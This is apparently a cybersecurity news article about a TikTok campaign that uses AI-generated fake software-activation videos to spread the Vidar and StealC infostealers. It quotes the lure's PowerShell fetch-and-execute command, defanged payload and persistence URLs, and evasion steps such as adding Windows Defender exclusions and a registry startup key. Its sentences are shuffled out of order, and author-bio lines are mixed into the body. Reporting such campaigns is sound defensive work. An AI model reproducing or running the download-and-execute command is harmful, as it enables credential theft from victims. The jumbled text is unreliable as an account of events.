Unlike conventional attacks that rely on malicious websites or email phishing, this operation embeds all social engineering elements directly within video content, making detection considerably more challenging for security solutions. A sophisticated social engineering campaign has emerged that leverages AI-generated videos to trick users into downloading dangerous information-stealing malware disguised as software activation tutorials. Notably, Vidar employs an innovative command-and-control strategy, abusing legitimate services like Steam profiles and Telegram channels as Dead Drop Resolvers to conceal actual C&C server addresses, making detection and takedown efforts significantly more complex. These deceptive videos promise to help users activate legitimate applications like Windows OS, Microsoft Office, CapCut, and Spotify, but instead deliver the notorious Vidar and StealC infostealers to unsuspecting victims. The persistence mechanism involves downloading an additional PowerShell script from hxxps://amssh[.]co/script[.]ps1 and establishing a registry key that ensures the malware executes at system startup. Victims are instructed to open PowerShell and execute a seemingly innocuous command: iex (irm hxxps://allaivo[.]me/spotify). This PowerShell script initiates a multi-stage infection process that demonstrates advanced evasion techniques. Upon execution, the initial PowerShell script creates hidden directories within the user’s APPDATA and LOCALAPPDATA folders, immediately adding these locations to Windows Defender’s exclusion list to prevent antivirus scanning. The campaign represents a significant evolution in malware distribution tactics, moving away from traditional web-based delivery methods to exploit the trust and engagement inherent in social media platforms. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. The researchers noted that these accounts posted strikingly similar faceless videos with AI-generated voices, suggesting an automated production process designed for scalability. The script then downloads the primary payload from hxxps://amssh[.]co/file.exe, which contains either Vidar or StealC malware variants. Trend Micro analysts identified multiple TikTok accounts involved in this operation, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771, all of which have since been deactivated. The attackers capitalize on TikTok’s viral nature, with one malicious video accumulating nearly 500,000 views, over 20,000 likes, and more than 100 comments, demonstrating the campaign’s alarming reach and effectiveness. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. Cybercriminals have discovered a new frontier for malware distribution by weaponizing TikTok’s massive user base and algorithmic reach.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 27 Jun 2025 14:45:10 +0000